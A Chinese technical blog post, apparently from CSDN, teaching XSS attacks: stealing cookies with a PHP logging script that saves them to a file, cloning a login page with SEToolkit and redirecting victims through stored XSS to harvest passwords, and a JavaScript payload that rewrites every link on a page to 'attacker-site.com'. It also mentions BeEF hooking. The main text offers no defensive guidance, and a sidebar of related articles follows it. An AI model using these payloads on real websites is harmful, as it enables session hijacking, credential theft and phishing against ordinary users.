XSS注入-盗取用户信息和内容篡改

最新推荐文章于 2024-04-06 13:21:56 发布
最新推荐文章于 2024-04-06 13:21:56 发布
阅读量1.8k 收藏 10
点赞数
分类专栏: XSS跨站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/90636957
版权

cookie介绍
  Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由Web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。
  目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段时间,一但超过规定时间,该Cookie就会被系统清除。
  服务器可以利用Cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。
  Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功能。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。
  php语言设置cookie:<?php setcookie('user','admin')?> <?php setcookie('user','admin',time()-1)?>
  由于cookie存储在客户端,随时有可能被盗取和滥用。
  
盗取cookie
  只要可以通过JS发送一个对应的HTTP请求,通过HTML注入相关的代码到页面中,当用访问或操作时,就会发送cookie值。
  利用盗取的cookie进行访问网页冒充合法用户权限认证。
  利用XSS获取cookie:
  服务端记录cookie php版本: <?php $cookie=$_GET["cookie"];$log=fopen("cookie.txt","a");fwrite($log,$cookie,"\n");fclose($log);?>

cookie欺骗
  利用http截断工具进行cookie值的替换。例如:
  在这里插入图片描述

在这里插入图片描述
盗取用户信息
  首先克隆网站登录页面,利用存储XSS设置跳转代码,如果用户访问即跳转到克隆的登录页面,用户输入登录,账号和密码被存储。
在这里插入图片描述
setookit工具克隆网站
万能社工工具。
在这里插入图片描述
此时就可以通过注入XSS payload:
诱导用户跳转到克隆网站,从而获取到用户输入的用户名和密码。

XSS篡改网页链接
JS代码事例:
  使用windows.onload 当窗口加载时,执行匿名函数。
  使用循环遍历所有获得的链接a标签。

<script>
	window.onload = function(){
		var link = document.getElementsByTagName("a");
		for (j = 0; j < link.length; j++) {
			link[j].href = "http://attacker-site.com/";}
	}
</script>

可以在存在XSS的位置插入上述脚本,触发执行替换a标签中链接的操作,当用户点击链接向目标主机发出HTTP请求。利用这种方式可以实现例如:重定向网站进行刷流量、篡改链接指向恶意URL。

篡改链接指向恶意URL
利用Beef进行恶意链接生成,以及利用hook.js执行其它命令。

在这里插入图片描述
访问beef
在这里插入图片描述

Mandorr
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
窃取登录信息_火狐:此链接不安全,输入的登录信息可能被窃取
weixin_42400970的博客
01-14 1040
如何去除火狐浏览器登录网站时的安全提示“此链接不安全,输入的登录信息可能被窃取”?Firefox火狐浏览器从52版本起,只要在采用非安全访问模式(即http协议,未经过SSL加密)的网页里输入密码均有安全警告提示。提示虽好,但给用户的操作带来了不便和疑惑,比如在开始输入用户名的时候可能因为这个提示遮住密码框。修改火狐浏览器配置项火狐浏览器地址栏里输入about:config,按回车键...
XSS盗取用户信息
qq_43776408的博客
07-27 967
盗取用户信息原理 类似于你要登QQ 我给你一个链接 你点开这个链接登录 你的用户名和密码都保存在这个链接所对应的服务器上 就不是官方服务器上了 setookit工具克隆网站 直接kali中输入setookit 假设win的IP地址为0.100 我们准备克隆下面的网站 192.168.0.100/dvwa/login.php 然后kali中的setookit中有很多选项 1231确定 下图你可以看到使用的是kali默认的IP0.104 然后再Enter the url后输入你想要克隆的网站URL 就刚才
xss介绍及作用
最新发布
冷人 菜鸟 的博客
04-06 594
为了防止JavaScript脚本的恶意注入,开发者应该对用户输入进行适当的过滤和转义,确保用户输入的数据在页面中被正确显示而不被解释为JavaScript代码。为了防止XSS攻击,网站开发者需要对用户输入进行有效的过滤和验证,对输出进行适当的转义,以防止恶意脚本的注入XSS攻击的原理是攻击者将恶意脚本插入到网页中的用户输入数据中,当其他用户访问包含该恶意脚本的网页时,浏览器执行这段脚本,从而导致攻击者能够窃取用户的敏感信息、篡改网页内容、劫持用户话等恶意行为。
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1186
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
xss脚本攻击获取用户cookie信息存储到本地
Lancis的博客
07-09 456
首先准备一个获取cookie的asp脚本 <html> <title>test</title> <body> <%testfile = Server.MapPath("code.txt") msg = Request("msg") set fs = server.CreateObject("scripting.filesystemobject") set thisfile = fs.OpenTextFile(testfile,8,True,0) th
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3544
xss之反射型(post)获取用户密码
预防XSS攻击和SQL注入XssFilter
05-19
(6)进行恶意操作,例如任意篡改页面信息、删除文章等; (7)进行大量的客户端攻击,如DDoS攻击; (8)获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; (9)控制受害者机器向其他网站发起攻击; (10...
JSP Struts过滤xss攻击的解决办法
10-19
在Web应用程序开发中,XSS(Cross Site Scripting)攻击是一种常见的安全威胁,它允许攻击者在用户的浏览器中注入恶意脚本,从而盗取用户数据或执行其他恶意操作。JSP与Struts作为经典的Java Web开发框架,也需要对...
XSS危险字符以及其处理方法
01-12
_attackers可以利用 XSS 漏洞旁路掉访问控制——例如同源策略(same origin policy),从而盗取用户帐号、控制企业数据、盗窃企业重要的具有商业价值的资料等。 XSS 攻击的危害包括: 1. 盗取各类用户帐号,如机器...
调取微信
weixin_30897233的博客
05-04 172
1 <a href="weixin://" onclick="PIWI_SUBMIT.Weixin_Open()">5545</a> 转载于:https://www.cnblogs.com/php-qiuwei/p/8991974.html
一文搞懂XSS攻击、SQL注入、CSRF攻击、DDOS攻击和DNS劫持
小司机的奥拓
12-06 937
Referer 检测。
web常见攻击手段 XSS,CSRF
weixin_42657666的博客
01-17 892
web常见攻击手段 XSS Cross Site Scripting 为了与“CSS”区分开来,故简称XSS,翻译过来就是“跨站脚本” 1. 存储型 ⾸先⿊客利⽤站点漏洞将⼀段恶意JavaScript代码提交到⽹站的数据库中; 然后⽤⼾向⽹站请求包含了恶意JavaScript脚本的⻚⾯; 当⽤⼾浏览该⻚⾯的时候,恶意脚本就将⽤⼾的Cookie信息等数据上传到服务器。 eg:文章的标题输入<script>alert(1)</script>
BugKu Web WriteUp
AlexYoung28的博客
08-24 2184
Web 8 这道题的代码和前面的文件包含写的思路一样, 我们都是运用  php://input 写,来实现我们从文件中读出的数据和我们传入的数据一样。 我写的如下:  只要保证  $ac  的值 和我们写入文件  $fn 的值 一样即可, 我这里都写的是 123 细心 这道题刚开始看到主页之后,又看了源代码和抓了包,发现都没有什么特别的地方,所以,只有拿御剑扫描一下后台。 ...
xss-labs 通关笔记
Ewige的博客
06-30 463
靶场地址:传送门 概述: XSS(跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 反射型XXS是一种非持久性的攻击,它指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的html代码被执行,从而达到恶意攻击用户的目的。这里插入的恶意代码并没有保存在目标网站,需要引诱用户点击一个链接到目标网站的恶意链接来实施攻击。 原文链接:ht
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 2925
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
干货|2020渗透测试面试问题大全 建议收藏
热门推荐
RuoLi_s的博客
01-28 2万+
转自HACK之道 乌雲安全 渗透篇 0.渗透测试知识体系结构 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等… 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为
工程攻击——setoolkit使用(含错误解决)
m0_57069925的博客
06-08 8576
此文章可学习钓鱼网站生成的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责社工程攻击,是一种利用“社工程学” (Social Engineering)来实施的网络攻击行为。比如免费下载的软件中捆绑了流氓软件、免费音乐中包含病毒、钓鱼网站、垃圾电子邮件中包括间谍软件等,都是近来社工程学的代表应用。Kali Linux系统集成了一款社工程学工具包 Social Engineering Toolkit (SET),它是一个基于Python的开源的社工程学渗透测试工具。这套工具包由Davi
SQL注入XSS跨站攻击,是WEB安全中常见攻击类型,稳居OWASP TOP10。针对SQL注入XSS跨站的说法中,哪项说法不正确? SQL注入的SQL命令在用户浏览器中执行,而XSS跨站的脚本在Web后台数据库中执行 XSS和SQL注入攻击中的攻击指令都是由黑客通过用户输入域注入,只不过XSS注入的是HTML代码(以后称脚本),而SQL注入注入的是SQL命令 XSS和SQL注入攻击都利用了Web服务器没有对用户输入数据进行严格的检查和有效过滤的缺陷 XSS攻击盗取Web终端用户的敏感数据,甚至控制用户终端操作,SQL注入攻击盗取Web后台数据库中的敏感数据,甚至控制整个数据库服务器
06-12
错误的说法是:SQL注入的SQL命令在用户浏览器中执行,而XSS跨站的脚本在Web后台数据库中执行。...而XSS跨站攻击则是指黑客通过恶意注入脚本代码,在用户浏览器端执行,从而盗取用户的敏感信息或者控制用户浏览器。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值